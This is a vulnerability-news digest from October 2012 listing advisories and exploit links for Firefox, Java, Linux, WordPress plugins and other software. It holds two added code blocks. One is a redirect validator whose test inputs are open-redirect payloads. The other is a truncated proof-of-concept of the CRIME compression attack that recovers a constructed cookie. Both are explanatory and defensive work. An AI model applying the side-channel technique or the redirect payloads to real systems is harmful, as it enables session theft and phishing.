Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1974 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55317

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1975 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55318

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1972 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55314

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3959 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55324

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3958 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55323

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3966 Multiple Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55274

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1976 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55319

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3978 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55306

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3957 Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55341

Mozilla Firefox/SeaMonkey CVE-2012-3976 Address Bar Spoofing Vulnerability
http://www.securityfocus.com/bid/55313

Mozilla Firefox/Thunderbird Web Console CVE-2012-3980 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55257

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3956 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55320

Linux Kernel dl2k Network Driver IOCTL Handling Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53965

python 'distutils' Component '~/.pypirc' File Local Race Condition Vulnerability
http://www.securityfocus.com/bid/52732

Python SimpleXMLRPCServer Denial Of Service Vulnerability
http://www.securityfocus.com/bid/51996

Python Hash Collision Denial Of Service Vulnerability
http://www.securityfocus.com/bid/51239

Python 'audioop' Module Memory Corruption Vulnerability
http://www.securityfocus.com/bid/40863

Python 'PySys_SetArgv' Remote Command Execution Vulnerability
http://www.securityfocus.com/bid/40862

Python 'audioop' Module Integer Overflow Vulnerability
http://www.securityfocus.com/bid/40370

Fedora 'Dracut' Package Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55713

Microsoft Internet Explorer Image Arrays Use-After-Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55562

Multiple HP Products CVE-2012-3268 Multiple Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56183

Linux Kernel CVE-2011-4110 NULL Pointer Dereference Denial of Service Vulnerability
http://www.securityfocus.com/bid/50755

Linux Kernel 'ib_uverbs_poll_cq()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/46488

Microsoft Internet Explorer OnMove Use-After-Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55641

Eduserv OpenAthens SP for Java CVE-2012-5353 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55899

ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55522

RETIRED: Adobe Flash Player and AIR APSB12-22 Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/55827

RETIRED: Adobe Flash Player and AIR APSB12-19 Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/55136

RETIRED: Adobe Shockwave Player APSB12-23 Multiple Code Execution Vulnerabilities
http://www.securityfocus.com/bid/56181

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
http://www.securityfocus.com/bid/54658

ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/53772

7-Zip Unspecified Archive Handling Vulnerability
http://www.securityfocus.com/bid/28285

Linux Kernel IPv6 'nf_ct_frag6_reasm()' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/54367

Linux Kernel 'sock_alloc_send_pskb()' Function Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/53721

Linux Kernel iptables '--syn' Rules Security Bypass Vulnerability
http://www.securityfocus.com/bid/53733

Linux Kernel 'taskstats' Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/55144

Icecast 'error.log' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56176

OpenStack Dashboard (Horizon) CVE-2012-3540 Redirect Module Open Redirection Vulnerability
http://www.securityfocus.com/bid/55329

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Tinyproxy Header Multiple Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/55099

ViewVC CVE-2012-4533 HTML Injection Vulnerability
http://www.securityfocus.com/bid/56161

ViewVC 'svn_ra.py' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54199

ViewVC 'svn_ra.py' Authorization Security Bypass Vulnerability
http://www.securityfocus.com/bid/54197

ViewVC 'cvsdb.py' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/47928

cups-pk-helper 'cupsGetFile()' and 'cupsPutFile()' Local Security Vulnerabilities
http://www.securityfocus.com/bid/55911

Drupal MailChimp Module Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/56234

Drupal Time Spent Module Multiple Unspecified Input Validation Vulnerabilities
http://www.securityfocus.com/bid/56233

VAM Shop Multiple Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56232

Winmail Server Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56231

WordPress Spider Calendar Plugin 'many_sp_calendar' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56228

DomainKeys Identified Mail (DKIM) Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56227

Liferay Portal Security Bypass and HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56226

Grandstream GXP1405 Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56186

Wednesday, October 24, 2012

24th, Wednesday, Shakkō


+ APSB12-23: Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb12-23.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4173
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4174
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4175
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4176

+ PDFCreator 1.5.1 released
http://download.pdfforge.org/download/pdfcreator/PDFCreator-stable

+ Wireshark 1.8.3 released
http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html

+ Microsoft Security Advisory (2755801) Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10
http://technet.microsoft.com/en-us/security/advisory/2755801

+ JVN#42676559 Vulnerability in Safari that allows local files to be read remotely
http://jvn.jp/jp/JVN42676559/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3713

+ SA51081 HP Multiple Products Unspecified Information Disclosure Vulnerabilities
http://secunia.com/advisories/51081/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268

Kingsoft releases a new Windows 8-compatible antivirus version with a "four-layer defense against remote-control malware" mechanism
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/432012/?ST=security

Serious vulnerability in the Safari web browser; JVN recommends "stop using the Windows version"
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/432003/?ST=security

NEC launches "NEC Cloud Authentication", a device authentication service based on software tokens
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/431902/?ST=security

JVNVU#841851 Command injection vulnerability in Mutiny
http://jvn.jp/cert/JVNVU841851/

JVNDB-2012-005004 (JVNVU#603276) Cross-site scripting vulnerability in OTRS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005004.html

JVNDB-2012-004939 (JVNVU#332412) Information disclosure vulnerability in ZENworks Asset Management
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004939.html

JVNDB-2012-004958 Vulnerability in the Deployment component of the Oracle Java SE Java Runtime Environment
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004958.html

JVNDB-2012-004451 Privilege escalation vulnerability in libdbus
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004451.html

JVNDB-2012-004379 Denial of service (daemon crash) vulnerability in ISC DHCP
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004379.html

JVNDB-2012-004457 Integer underflow vulnerability in the International Color Consortium Format library
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004457.html

JVNDB-2012-000088 (JVN#42676559) (JVNVU#503755) Vulnerability in Safari that allows local files to be read remotely
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-000088.html

JVNDB-2012-005083 (JVNVU#841851) Command injection vulnerability in Mutiny
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005083.html

JVNDB-2012-005082 Denial of service (DoS) vulnerability in IBM XIV Storage System Gen3
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005082.html

JVNDB-2012-005080 Stack-based buffer overflow vulnerability in IBM DB2
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005080.html

JVNDB-2012-005079 Denial of service (DoS) vulnerability in CA ARCserve Backup running on Windows
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005079.html

JVNDB-2012-005078 Arbitrary code execution vulnerability in the CA ARCserve Backup server running on Windows
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005078.html

JVNDB-2012-003475 Denial of service (DoS) vulnerability in the MIT Kerberos KDC
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003475.html

JVNDB-2012-003474 Denial of service (DoS) vulnerability in the MIT Kerberos KDC
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003474.html

JVNDB-2012-003918 Vulnerability in Oracle Java 7
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003918.html

JVNDB-2012-004019 Vulnerability in the Beans component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004019.html

JVNDB-2012-002755 Vulnerability in the Libraries component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002755.html

JVNDB-2012-002754 Vulnerability in the Hotspot component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002754.html

JVNDB-2012-002751 Vulnerability in the Deployment component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002751.html

JVNDB-2012-002750 Vulnerability in the Deployment component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002750.html

JVNDB-2012-002748 Vulnerability in the CORBA component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002748.html

JVNDB-2012-002747 Vulnerability in the Security component of the Oracle Java SE Java Runtime Environment (JRE)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002747.html

Cyber Security Awareness Month - Day 23: Character Encoding Standards - ASCII and Successors
http://isc.sans.edu/diary.html?storyid=14362

VU#160027 Broadcom BCM4325 and BCM4329 wireless chipset denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/160027

VU#872545 Adobe Shockwave 11.6.7.637 contains multiple exploitable vulnerabilities
http://www.kb.cert.org/vuls/id/872545

Adobe Shockwave Player Buffer Overflows and Array Error Lets Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027692

HP/H3C and Huawei SNMP Weak Access to Critical Data
http://cxsecurity.com/issue/WLB-2012100207

Linksys WRT54GX (ADSL Router) Cross Site Request Forgery
http://cxsecurity.com/issue/WLB-2012100206

Apple QuickTime 7.7.2(1680.56) Division By Zero
http://cxsecurity.com/issue/WLB-2012100205

phpMyFAQ <= 2.6.8 XSS
http://cxsecurity.com/issue/WLB-2012100204

HP Intelligent Management Center UAM sprintf Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080293

HP OO RSScheduler Service JDBC Connector Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080295

HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080288

HP SiteScope UploadFilesHandler Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080288

HP SiteScope SOAP Call getFileInternal Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080289

HP SiteScope SOAP Call create Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080290

Adobe Flash Player "Matrix3D" Integer Overflow Code Execution
http://cxsecurity.com/issue/WLB-2012090118

phpMyAdmin 3.5.2.2 server_sync.php backdoor
http://cxsecurity.com/issue/WLB-2012090231

IBM Lotus Notes Traveler 8.5.3 XSS & CSRF & Brute Force
http://cxsecurity.com/issue/WLB-2012100020

OTRS 3.1 Stored XSS Vulnerability
http://cxsecurity.com/issue/WLB-2012100157

HP Multiple Products Unspecified Information Disclosure Vulnerabilities
http://secunia.com/advisories/51081/

ViewVC Diff View Script Insertion Vulnerability
http://secunia.com/advisories/51041/

Bitrix Site Manager JW Player Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51021/

WordPress UnGallery Plugin "search" Arbitrary Command Execution Vulnerability
http://secunia.com/advisories/50875/

ManageEngine Security Manager Plus File Disclosure and SQL Injection Vulnerabilities
http://secunia.com/advisories/51069/

WordPress Zingiri Form Builder Plugin "error" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50983/

WordPress Thank You Counter Button Plugin "paged" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50977/

WordPress Zingiri Bookings Plugin "error" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50975/

F5 FirePass SQL Injection and Redirection Vulnerabilities
http://secunia.com/advisories/51045/

Dolibarr ERP/CRM Two Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51058/

Magento Unirgy uStoreLocator Extension SQL Injection Vulnerability
http://secunia.com/advisories/50917/

Avaya Aura Presence Services Linux Kernel Multiple Vulnerabilities
http://secunia.com/advisories/51077/

Apache OFBiz Unspecified Vulnerability
http://secunia.com/advisories/51052/

Palo Alto Networks GlobalProtect Certificate Verification Security Issue
http://secunia.com/advisories/51036/

REMOTE: Turbo FTP Server 1.30.823 PORT Overflow
http://www.exploit-db.com/exploits/22161

DoS/PoC: Adobe Reader 10.1.4 Crash PoC
http://www.exploit-db.com/exploits/22155

DoS/PoC: RealPlayer 15.0.6.14 .3gp Crash PoC
http://www.exploit-db.com/exploits/22154

Korenix Jetport 5600 Series Default Credentials Authentication Bypass Vulnerability
http://www.securityfocus.com/bid/55196

Linux Kernel 'mmap()' Failure Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53668

Linux Kernel 'inet->opt ip_options' Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/55359

Linux Kernel 'rds_recvmsg()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54702

Linux Kernel dl2k Network Driver IOCTL Handling Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53965

Linux Kernel 'i915_gem_execbuffer.c' Multiple Integer Overflow Vulnerabilities
http://www.securityfocus.com/bid/53971

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Oracle Java SE CVE-2012-5081 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56071

ViewVC 'cvsdb.py' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/47928

ViewVC 'svn_ra.py' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54199

ViewVC CVE-2012-4533 HTML Injection Vulnerability
http://www.securityfocus.com/bid/56161

ViewVC 'svn_ra.py' Authorization Security Bypass Vulnerability
http://www.securityfocus.com/bid/54197

Adobe Shockwave Player APSB12-23 Multiple Code Execution Vulnerabilities
http://www.securityfocus.com/bid/56181

Oracle Java SE CVE-2012-5088 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56057

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

Oracle Java SE CVE-2012-5089 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56059

Oracle Java SE CVE-2012-5087 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56043

Oracle Java SE CVE-2012-5084 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56063

Oracle Java SE CVE-2012-5077 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56058

Oracle Java SE CVE-2012-5079 Remote Security Bypass Vulnerability
http://www.securityfocus.com/bid/56082

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Oracle Java SE CVE-2012-5086 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56039

Oracle Java SE CVE-2012-5083 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56025

Oracle Java SE CVE-2012-5076 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56054

Oracle Java SE CVE-2012-5073 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56080

Oracle Java SE CVE-2012-5075 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56081

Oracle Java SE CVE-2012-5074 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56056

Oracle Java SE CVE-2012-5070 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56079

Oracle Java SE CVE-2012-5072 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56083

Oracle Java SE CVE-2012-5069 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56065

Oracle Java SE CVE-2012-5068 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56076

Oracle Java Virtual Machine (JVM) CVE-2012-4416 Remote Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55501

Oracle Java SE CVE-2012-3216 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56075

Oracle Java SE CVE-2012-5067 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56070

Oracle Java SE CVE-2012-1531 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56033

Oracle Java SE CVE-2012-3143 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56055

Oracle Java SE CVE-2012-3159 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56072

Oracle Java SE CVE-2012-1532 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56051

Oracle Java SE CVE-2012-1533 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56046

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

cups-pk-helper 'cupsGetFile()' and 'cupsPutFile()' Local Security Vulnerabilities
http://www.securityfocus.com/bid/55911

Tinyproxy Header Multiple Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/55099

Oracle April 2007 Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/23532

Oracle January 2007 Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/22083

Oracle October Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/15134

Oracle January 2008 Critical Patch Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/27229

BreakPoint Software Hex Workshop '.hex' File Handling Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/33932

Ots Labs OtsTurntables M3U Local Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/25514

Oracle January Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/16287

Sun Solaris 'CODE_GET_VERSION IOCTL' Local Denial Of Service Vulnerability
http://www.securityfocus.com/bid/38016

FirePass SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability
http://www.securityfocus.com/bid/56156
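
Several entries on this page are URL redirection flaws (the FirePass 'refreshURL' item above, the F5 FirePass redirection item in the Secunia list, and the OpenStack Horizon redirect module item under October 31). The block below is an added example, not code from F5, OpenStack or the original post: it puts the usual "starts with a slash, so it is local" check next to a stricter validator for a post-login redirect parameter. The host name vpn.example.com, the function names and the sample targets are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed for the example: the only host a redirect may point back to.
ALLOWED_HOSTS = {"vpn.example.com"}


def naive_is_local(target: str) -> bool:
    """The check many login handlers ship with. It accepts '//evil.example/'
    and '/\\evil.example', both of which browsers resolve off-site."""
    return target.startswith("/")


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Accept a redirect parameter only if it stays on this site.

    Rejected: empty values; control characters (CR/LF header injection);
    schemes other than http(s) such as javascript: or data:; protocol-relative
    targets (//host, plus /\\host and ///host, which browsers normalise to
    //host); absolute URLs whose host is not ours, including the userinfo
    trick https://vpn.example.com@evil.example/ (real host: evil.example).
    """
    if not target or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Browsers treat '\' like '/' in the authority part of http(s) URLs.
    candidate = target.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:            # e.g. malformed IPv6 bracket syntax
        return False
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return False
        # 'http:evil.example' parses with an empty netloc; treat it as foreign.
        return bool(parts.netloc) and (parts.hostname or "") in allowed_hosts
    if parts.netloc:              # protocol-relative: //evil.example/
        return (parts.hostname or "") in allowed_hosts
    # Path-only target. urlsplit('///x') reports an empty netloc, but browsers
    # read the third slash as the start of a host, so require exactly one '/'.
    return candidate.startswith("/") and not candidate.startswith("//")


def redirect_target(param: str, fallback: str = "/") -> str:
    """Value the handler should put in the Location header."""
    return param if is_safe_redirect(param) else fallback


if __name__ == "__main__":
    for t in ["/portal/home", "//evil.example/", "/\\evil.example",
              "https://vpn.example.com@evil.example/", "javascript:alert(1)"]:
        print(f"{t!r:45} naive={naive_is_local(t)!s:5} strict={is_safe_redirect(t)}")
```

The strict check rejects anything it cannot positively classify as same-site; a fallback to "/" is the right failure mode for a redirect parameter, since a user landing on the front page is harmless while a user landing on an attacker's login form is not.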

Cerulean Studios Trillian Multiple Remote Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/29330

ManageEngine Security Manager Plus Advanced Search SQL Injection Vulnerability
http://www.securityfocus.com/bid/56138

Linux Kernel Unix Sockets Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/45037

Linux Kernel Unix Socket Backlog Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/46637

Linux Kernel 'ethtool.c' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/45972

Drupal Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Django 'HttpRequest.get_host()' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56146

FreeRADIUS Multiple Stack Based Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/55483

JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/55199

JW Player 'playerready' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/54739

JW Player Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/48214

JW Player HTML Injection And Content Spoofing Vulnerability
http://www.securityfocus.com/bid/53876

Ruby CVE-2012-4522 Local File Creation Vulnerability
http://www.securityfocus.com/bid/56115

Ruby '#to_s' Method Incomplete Fix Security Bypass Vulnerability
http://www.securityfocus.com/bid/55813

Ruby 'error.c' Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55757

GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/54982

Real Networks RealPlayer Write Access Violation Arbitrary Code Execution Vulnerability
http://www.securityfocus.com/bid/56113

OpenJPEG Heap Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55214

HAProxy Trash Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/53647

Broadcom BCM4325 and BCM4329 Wireless Chipset Out of Bound Read Denial of Service Vulnerability
http://www.securityfocus.com/bid/56184

Multiple HP Products CVE-2012-3268 Multiple Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56183

WordPress UnGallery Plugin 'search' Parameter Remote Arbitrary Command Execution Vulnerability
http://www.securityfocus.com/bid/56182

WordPress Thank You Counter Button Plugin 'paged' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56180

WordPress Zingiri Form Builder Plugin Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56179

WordPress Bookings Plugin 'error' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56177

F5 FirePass Remote SQL Injection Vulnerability
http://www.securityfocus.com/bid/56175

Joomla! 'com_sqlreport' Component Password Disclosure Vulnerability
http://www.securityfocus.com/bid/56172

Tuesday, October 23, 2012

23rd, Tuesday, Taian


+ HPSBHF02819 SSRT100920 rev.1 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%25253Demr_na-c03515685%25257CdocLocale%25253Dja_JP&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268

+ Check Point response to CVE-2012-4930 aka CRIME attack
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86443&src=securityAlerts
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4930
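
CVE-2012-4930 (CRIME) is a compression side channel: when a request is compressed before encryption, an attacker who controls part of the plaintext can learn a secret in the same stream from the ciphertext length alone. The block below is an added example, not from Check Point, the CRIME authors or the original post. It models a compressed HTTP request with zlib and recovers a constructed cookie value byte by byte; the header layout, the secret, the host name and the padding bytes are all made up for the demonstration, and it assumes zlib's fixed-Huffman strategy (Z_FIXED) is available, falling back to the default strategy otherwise.

```python
import zlib

# Constructed demo values; nothing here comes from a real deployment.
SECRET = "7f3a9c0e1b42d58a"      # victim's cookie value, unknown to the attacker
CHARSET = "0123456789abcdef"     # alphabet the secret is drawn from
MARKER = "Cookie: sessionid="    # public text that precedes the secret
# Padding bytes that occur nowhere else in the stream. Under DEFLATE's fixed
# Huffman table, byte values 144-255 take 9-bit literal codes, so each extra
# pad byte shifts the bit alignment by one; byte rounding therefore cannot
# hide a 7- or 8-bit saving for every pad length at once.
PADS = [bytes(range(0xA1, 0xA1 + k)) for k in range(1, 9)]
STRATEGY = getattr(zlib, "Z_FIXED", zlib.Z_DEFAULT_STRATEGY)  # assumption: Z_FIXED exported


def compressed_request_len(attacker_path: bytes, secret: str = SECRET) -> int:
    """Model of one TLS-compressed request: the attacker chose the path, the
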